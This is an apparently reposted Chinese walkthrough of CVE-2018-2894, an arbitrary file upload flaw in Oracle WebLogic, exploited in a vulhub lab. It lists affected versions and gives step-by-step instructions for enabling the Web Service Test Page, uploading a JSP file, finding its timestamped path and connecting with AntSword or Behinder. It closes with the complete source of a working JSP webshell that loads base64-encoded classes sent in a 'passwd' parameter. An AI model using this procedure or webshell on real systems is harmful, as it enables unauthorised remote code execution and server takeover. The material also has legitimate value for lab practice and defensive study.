• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

任意文件上传漏洞CVE-2018-2894

武飞扬头像
K.A.L
帮助2

漏洞描述

Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。

漏洞影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

IP地址  http://192.168.xxx.xxx:7001/console    //进入后台系统

学新通

用户账号密码获取

vulhub靶场默认账户是weblogic   密码查看一下logs就能找到了

在kali上执行  docker-compose logs | grep password

学新通

环境准备

进入高级配置学新通

 学新通

在此处一定要进行勾选启用web服务器测试页,勾选后下拉的最下方进行保存配置

路径: http://192.168.17.130:7001/ws_utc/config.do

学新通

当前的工作目录路径,配置完成后进行保存

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

但在此处是有坑的如果这里的配置这里最后有css,那么上传文件后,你的访问链接应该是

路径:http://localhost:7001/ws_utc/css/config/keystore/1637485345393_shell.jsp

如果没有添加/css 那么上传文件后你的链接应该是

路径:http://localhost:7001/ws_utc/config/keystore/1637485345393_shell.jsp

   安全->添加->浏览

学新通

 上传成功之后,查看返回的数据包,其中有时间戳

可以通过查看源代码的方式或者使用Burp抓包进行获取

学新通

 获取权限

获取权限的路径   http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

我们可以使用蚁剑或者冰蝎进行连接来获取权限

http://192.168.17.130:7001/ws_utc/css/config/keystore/1666276503565_shell.jsp

学新通

shell.jsp 文件 (jsp一句话木马)

【连接密码】: passwd

  1.  
    <%!
  2.  
    class U extends ClassLoader {
  3.  
    U(ClassLoader c) {
  4.  
    super(c);
  5.  
    }
  6.  
    public Class g(byte[] b) {
  7.  
    return super.defineClass(b, 0, b.length);
  8.  
    }
  9.  
    }
  10.  
     
  11.  
    public byte[] base64Decode(String str) throws Exception {
  12.  
    try {
  13.  
    Class clazz = Class.forName("sun.misc.BASE64Decoder");
  14.  
    return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
  15.  
    } catch (Exception e) {
  16.  
    Class clazz = Class.forName("java.util.Base64");
  17.  
    Object decoder = clazz.getMethod("getDecoder").invoke(null);
  18.  
    return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
  19.  
    }
  20.  
    }
  21.  
    %>
  22.  
    <%
  23.  
    String cls = request.getParameter("passwd");
  24.  
    if (cls != null) {
  25.  
    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
  26.  
    }
  27.  
    %>

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhcjahgj
系列文章
更多 icon
同类精品
更多 icon
继续加载